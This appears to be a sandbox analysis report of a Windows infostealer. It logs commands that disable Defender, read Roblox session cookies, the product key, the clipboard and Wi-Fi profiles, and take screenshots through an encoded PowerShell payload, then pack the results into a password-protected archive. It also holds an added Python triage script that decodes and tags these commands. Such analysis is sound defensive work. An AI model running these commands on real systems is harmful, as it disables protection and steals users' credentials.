              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
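The process-creation lines above are one chain rather than unrelated events: the -EncodedCommand argument is base64 of a UTF-16LE PowerShell script that defines, via Add-Type, a C# class named Screenshot which captures every display with Graphics.CopyFromScreen (that is why csc.exe and cvtres.exe run right after it); the Get-ItemPropertyValue calls read the Roblox session cookie and the backup Windows product key from the registry; tree, getmac and the wmic queries enumerate the host; and rar.exe, launched from the PyInstaller extraction directory _MEI33962, packs the loot into a password-protected archive. The Python below is an added example for this report, not Joe Sandbox code and not part of the sample. It decodes the encoded command while tolerating the truncation the report applies to long arguments, and tags each command line with the behaviour it indicates. The inputs are the command lines quoted above (the encoded argument cut to its first 388 characters) plus one constructed benign line as a control; the rule names, the phase grouping and the verdict threshold are this example's own assumptions.

```python
"""Triage helpers for the process-creation lines of the report above.

Added example; not Joe Sandbox code and not part of the analysed sample.
SAMPLE_CMDLINES are the report's own command lines, with the -EncodedCommand
argument cut to its first 388 base64 characters (the report line is itself
truncated), plus one constructed benign command line as a control.
"""
import base64
import re

# First 388 characters of the -EncodedCommand argument shown in the report.
ENCODED_PREFIX = (
    "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAK"
    "AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1"
    "AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoA"
    "dQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0A"
    "CgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAK"
)

SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED_PREFIX,
    r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
    r'C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *',
    "wmic csproduct get uuid",
    "wmic path win32_VideoController get name",
    "tree /A /F",
    "getmac",
    r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
    r"notepad.exe C:\Users\user\Desktop\notes.txt",  # constructed benign control, not from the report
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, and -ec.
_ENC_FLAG = "|".join(["ec"] + ["encodedcommand"[:n] for n in range(1, 15)])
ENCODED_ARG = re.compile(r"\s-(?:%s)\s+(?P<b64>[A-Za-z0-9+/=]+)" % _ENC_FLAG, re.I)

# Rule names are this example's own labels for the behaviours in the report.
RULES = {
    "encoded_powershell": re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:%s)\s" % _ENC_FLAG, re.I),
    "execution_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I),
    "roblox_cookie_theft": re.compile(r"\\Roblox\\.*-Name\s+\.ROBLOSECURITY\b", re.I),
    "password_protected_rar": re.compile(r"\brar(?:\.exe)?\s+a\b.*\s-hp", re.I),
    "pyinstaller_temp_dir": re.compile(r"\\_MEI\d+\\", re.I),
    "wmi_host_fingerprint": re.compile(r"\bwmic\b.*\bget\b", re.I),
    "product_key_read": re.compile(r"SoftwareProtectionPlatform.*BackupProductKeyDefault", re.I),
    "directory_tree_dump": re.compile(r"\btree(?:\.com)?\s+/A\s+/F\b", re.I),
    "mac_address_enum": re.compile(r"^\s*getmac(?:\.exe)?\s*$", re.I),
}


def classify(cmdline):
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE), or None.

    Sandbox reports routinely truncate the argument, so the base64 is trimmed
    to a decodable length and a dangling odd byte is dropped instead of
    raising; the caller gets whatever prefix of the script survived.
    """
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group("b64").rstrip("=")
    if len(b64) % 4 == 1:  # a single leftover character cannot encode a byte
        b64 = b64[:-1]
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    raw = raw[: len(raw) - len(raw) % 2]  # UTF-16 needs whole 2-byte code units
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdlines):
    """Tag each line and report whether collection, staging and recon co-occur."""
    hits = [(cmd, classify(cmd)) for cmd in cmdlines]
    caps = {tag for _, tags in hits for tag in tags}
    collection = {"encoded_powershell", "roblox_cookie_theft", "product_key_read", "directory_tree_dump"}
    staging = {"password_protected_rar"}
    recon = {"wmi_host_fingerprint", "mac_address_enum"}
    # One hit alone is weak evidence (admins run wmic and tree too); all three
    # phases together are what this report shows and what a stealer needs.
    verdict = "stealer-like" if caps & collection and caps & staging and caps & recon else "inconclusive"
    scripts = [decode_encoded_command(cmd) for cmd, tags in hits if "encoded_powershell" in tags]
    classes = [c for s in scripts if s for c in re.findall(r"public\s+class\s+(\w+)", s)]
    return {"hits": hits, "capabilities": sorted(caps), "verdict": verdict, "compiled_classes": classes}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINES)
    for cmd, tags in result["hits"]:
        print(f"{tags or ['-']}  {cmd[:70]}")
    print(result["verdict"], result["compiled_classes"])
```

The decoder is the part worth keeping: -EncodedCommand is UTF-16LE before it is base64, so a naive `base64 -d | strings` shows one character per line and a truncated report field fails outright, whereas trimming to whole base64 groups and whole code units yields the readable prefix (`$source = @"` followed by the `using` lines and `public class Screenshot`). Run it against the full argument from the joined report line above to recover the complete CaptureScreens method.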
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: python3.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libffi-8.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: sqlite3.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libssl-3.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msasn1.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: avicap32.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msvfw32.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dciman32.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmmbase.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: devobj.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: ksuser.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: avrt.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: audioses.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: powrprof.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: umpdc.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msacm32.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: midimap.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dpapi.dll
Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
